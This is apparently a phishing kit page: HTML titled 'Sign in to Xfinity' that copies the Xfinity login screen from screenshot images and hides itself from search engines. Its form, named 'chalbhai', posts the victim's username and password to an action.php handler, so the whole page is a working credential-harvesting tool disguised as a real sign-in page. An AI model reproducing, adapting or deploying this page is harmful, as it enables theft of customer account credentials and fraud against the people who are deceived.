<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sign in to Xfinity</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta charset="utf-8" />
<meta name="applicable-device" content="pc,mobile" />
 <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta name="robots" content="noindex, nofollow">
  <meta name="googlebot" content="noindex, nofollow">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="format-detection" content="telephone=no" />

<link rel="shortcut icon"
              href="https://s22.postimg.cc/jm4bbrc3l/download.png"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">
<style type="text/css">

.textox {
   width: 279px;
   height: 40px;
   border: solid 1px #BFBFBF;
   padding: 2px;
   border-radius: 3px;
   font-size: 12px;
   background-color: #FFFFFF;
   outline: none;
   color: #474747;
  }
.textox:focus  {
   border: solid 1px #6AB6E6;
  }
  
.textox2 {
   width: 139px;
   height: 24px;
   border: solid 1px #FFFFFF;
   padding: 2px;
   border-radius: 3px;
   font-size: 12px;
   background-color: #FFFFFF;
   outline: none;
   color: #474747;
  }

input[type=checkbox].css-checkbox {
							position:absolute; z-index:-1000; left:-1000px; overflow: hidden; clip: rect(0 0 0 0); height:1px; width:1px; margin:-1px; padding:0; border:0;
						}

						input[type=checkbox].css-checkbox + label.css-label, input[type=checkbox].css-checkbox + label.css-label.clr {
							padding-left:29px;
							height:24px; 
							display:inline-block;
							line-height:24px;
							background-repeat:no-repeat;
							background-position: 0 0;
							font-size:24px;
							vertical-align:middle;
							cursor:pointer;

						}

						input[type=checkbox].css-checkbox:checked + label.css-label, input[type=checkbox].css-checkbox + label.css-label.chk {
							background-position: 0 -24px;
						}
						label.css-label {
				background-image:url(http://csscheckbox.com/checkboxes/u/csscheckbox_a608ec28e6c50a02870bf452f125b974.png);
				-webkit-touch-callout: none;
				-webkit-user-select: none;
				-khtml-user-select: none;
				-moz-user-select: none;
				-ms-user-select: none;
				user-select: none;
			}

</style>

</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:799px; height:586px; z-index:0"><img src="https://s22.postimg.cc/wuusvclfl/image2.png" alt="" title="" border=0 width=799 height=586></div>
<div id="image1" style="position:absolute; overflow:hidden; left:920px; top:52px; width:110px; height:38px; z-index:0"><img src="https://s22.postimg.cc/5lt2rynu9/logo.png" alt="" title="" border=0 width=110 height=38></div>
<div id="image1" style="position:absolute; overflow:hidden; left:799px; top:0px; width:344px; height:24px; z-index:0"><img src="https://s22.postimg.cc/vskmdafm9/upbackground.png" alt="" title="" border=0 width=344 height=24></div>
<div id="image1" style="position:absolute; overflow:hidden; left:1141px; top:0px; width:211px; height:585px; z-index:0"><img src="https://s22.postimg.cc/xmxgumpnl/rightbackground.png" alt="" title="" border=0 width=211 height=585></div>
<div id="image1" style="position:absolute; overflow:hidden; left:845px; top:265px; width:133px; height:24px; z-index:0"><img src="https://s22.postimg.cc/kuees12fl/staysignedin.png" alt="" title="" border=0 width=133 height=24></div>

<form action="action.php" name=chalbhai id=chalbhai method=post>

<input name="userid"  required title="Username" autocomplete="off" placeholder="Username, email, or mobile" maxlength="35" class="formCtlColumn" type="text" style="position:absolute;padding-left:11px;font-size:17px;height:60px;width:299px;left:821px;top:125px;z-index:1">>
<input name="pass"  required title="Password" autocomplete="off" placeholder="Password" maxlength="30" class="formCtlColumn" type="password" style="position:absolute;padding-left:11px;font-size:17px;height:60px;width:299px;left:821px;top:192px;z-index:1">>

<div id="checkboxG1"  style="position:absolute; left:818px; top:268px; z-index:24"><input type="checkbox" name="checkboxG2" id="checkboxG2" ><label for="checkboxG2" class="css-label radGroup1 clr"></label></div>
<div id="formimage1" style="position:absolute; left:820px; top:413px; z-index:13"><input type="image" name="formimage1" width="306" height="156" src="https://s22.postimg.cc/68ne3tnnl/forget.png"></div>
<div id="formimage1" style="position:absolute; left:905px; top:322px; z-index:13"><input type="image" name="formimage1" width="133" height="52" src="https://s22.postimg.cc/hmeisqsox/signin.png"></div>
<div id="image9" style="position:absolute; overflow:hidden; left:0px; top:583px; width:801px; height:102px; z-index:0"><img src="https://s22.postimg.cc/wmbgu9tsx/downmenu1.png" alt="" title="" border=0 width=801 height=102></div>
<div id="image9" style="position:absolute; overflow:hidden; left:801px; top:581.2px; width:550px; height:103px; z-index:0"><img src="https://s22.postimg.cc/mdizo6xyp/downmenu2.png" alt="" title="" border=0 width=550 height=103></div>

</body>
</html>
